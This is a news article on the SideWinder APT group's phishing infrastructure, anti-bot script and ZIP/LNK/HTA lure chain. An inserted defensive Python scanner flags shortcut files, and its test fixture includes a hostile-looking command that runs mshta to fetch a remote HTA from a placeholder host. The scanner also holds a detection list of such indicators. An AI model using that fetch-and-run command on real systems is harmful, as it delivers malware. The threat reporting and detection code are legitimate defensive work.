Group-IB shares details on APT group SideWinder hacker, targeting government, military, economic sectors


Researchers at Group-IB Threat Intelligence have discovered new malicious infrastructure and a custom tool of the SideWinder APT group, which is believed to be an Indian nation-state threat actor. In its attacks, SideWinder was seen targeting government, military, and economic sectors across Southeast Asia, including Afghanistan, Nepal, Sri Lanka, Bhutan, Myanmar, the Philippines, Bangladesh, Singapore, and China. However, since the discovery of the group in 2012, Pakistan remains the primary target of SideWinder.

“Over the last year, Group-IB’s Threat Intelligence solution detected 92 IP addresses used by SideWinder,” Group-IB researchers said in a blog post. “The servers were automatically detected by Group-IB and Threat Intelligence users immediately received a proactive notification about the appearance of the new malicious infrastructure. The analysis of the servers revealed that they were primarily used for phishing attacks,” they added.

Phishing links in emails or posts that mimic legitimate notifications and services of government agencies and organizations in Pakistan have been identified as primary attack vectors of the gang. “SideWinder started using an anti-bot script to filter their victims – they are only interested in Pakistani users. The group continues to distribute malicious files in ZIP archives with an LNK file inside, which downloads an HTA file from a remote server,” the researchers added.
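One way a defender can screen incoming archives for the ZIP-with-LNK-to-HTA lure chain described above, as an added example that is neither Group-IB's tool nor code from the post: a minimal parser for the StringData block of a Windows shortcut (following the public MS-SHLLINK layout) that flags archived .lnk entries whose arguments reference an HTA or a URL. The sample archive and shortcut are constructed inline for the demonstration, and example.invalid is a placeholder host.

```python
import io, struct, zipfile

LNK_HEADER_SIZE = 0x4C
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_ARGUMENTS, IS_UNICODE = 0x01, 0x02, 0x20, 0x80
STRING_FIELDS = (("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10), ("arguments", 0x20), ("icon_location", 0x40))
SUSPICIOUS = ("mshta", ".hta", "http://", "https://")  # the LNK-to-HTA lure chain described above

def lnk_string_data(data: bytes) -> dict:
    """Parse the StringData block of a .lnk (MS-SHLLINK layout); returns only the fields present."""
    if struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a shell link file")
    flags, pos = struct.unpack_from("<I", data, 0x14)[0], LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (4 bytes) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    wide, fields = bool(flags & IS_UNICODE), {}
    for name, bit in STRING_FIELDS:  # fixed order, each: CountCharacters + chars
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            size = count * 2 if wide else count
            fields[name] = data[pos:pos + size].decode("utf-16-le" if wide else "cp1252", "replace")
            pos += size
    return fields

def scan_zip(zip_bytes: bytes) -> list:
    """Return (entry name, matched indicators) for every .lnk entry in the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".lnk"):
                text = " ".join(lnk_string_data(zf.read(info)).values()).lower()
                findings.append((info.filename, [s for s in SUSPICIOUS if s in text]))
    return findings

def build_sample_lnk(arguments: str) -> bytes:
    # Constructed test artifact: minimal .lnk whose only StringData field is Arguments.
    clsid = bytes.fromhex("0114020000000000c000000000000046")  # ShellLink CLSID
    header = struct.pack("<I16sIIQQQIIIH10s", LNK_HEADER_SIZE, clsid, HAS_ARGUMENTS | IS_UNICODE,
                         0, 0, 0, 0, 0, 0, 1, 0, b"\0" * 10)
    return header + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")

def build_sample_zip() -> bytes:
    # Constructed archive: one benign file plus an LNK pointing at a placeholder HTA URL.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", b"benign")
        zf.writestr("Notice.pdf.lnk", build_sample_lnk("/c mshta http://example.invalid/lure.hta"))
    return buf.getvalue()
```

Real-world shortcuts usually carry an IDList and LinkInfo before the strings, which the parser skips by their declared sizes; a mail gateway would feed each attachment to scan_zip and quarantine any entry with a non-empty indicator list.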

Over the last year, several SideWinder attacks targeting Pakistan have been detected. SideWinder was particularly interested in Pakistani military targets, the post said. The SideWinder group also goes by the names Rattlesnake, Hardcore Nationalist, RAZOR TIGER, T-APT-04, and APT-C-17. The newly discovered custom tool, codenamed ‘SideWinder.AntiBot.Script,’ is being used in the gang’s phishing attacks against Pakistani targets.

Upon discovery, the Group-IB Threat Intelligence team notified relevant local authorities and shared its findings to make sure that the threat can be identified and contained at its early stages. CERT-GIB also sent notifications to dedicated computer emergency response teams in Pakistan, according to the post. The Pakistani government even published an official advisory about SideWinder activity, the post added.

Group-IB researchers have repeatedly spotted phishing documents intended for Pakistani targets in public and private sector organizations. A phishing document containing information about a proposal for a formal discussion of the impact of U.S. withdrawal from Afghanistan on maritime security was detected. 

The group has also been seen cloning government websites to collect user credentials. The researchers found a phishing page mimicking a government portal in Sri Lanka designed by SideWinder. 

SideWinder has been one of the most aggressive threat actors in the past couple of years. “Some of the main characteristics of this threat actor that make it stand out among the others, are the sheer number, high frequency, and persistence of their attacks and the large collection of encrypted and obfuscated malicious components used in their operations,” Kaspersky revealed in a report that was presented at Black Hat Asia last month.

“We have detected over a thousand attacks by this APT actor since April 2020. They also maintain a large infrastructure base with hundreds of domains and subdomains used as Download and Command and Control Servers,” it added.

SideWinder has been active since at least 2012 and for several years, its main target profile included police, military, maritime, and the naval forces of Central Asian countries, Kaspersky said. “In recent years, they have also targeted departments of Foreign Affairs, Scientific and Defence organisations, Aviation, IT industry and Legal firms. Some of their newly registered domains and spearphishing documents indicate this threat actor is expanding the geography of its targets to other countries and regions.”

Kaspersky also said that the threat actor has a relatively high level of sophistication using various infection vectors and advanced attack techniques. “These techniques include multiple obfuscation routines, encryption with unique keys for each malicious file, multi-layer malwares, memory-resident malwares and splitting infrastructure strings into different malware components,” it added.

Recorded Future said in April that it had observed in recent months likely network intrusions targeting at least seven Indian State Load Despatch Centres (SLDCs) responsible for carrying out real-time operations for grid control and electricity dispatch within these respective states.
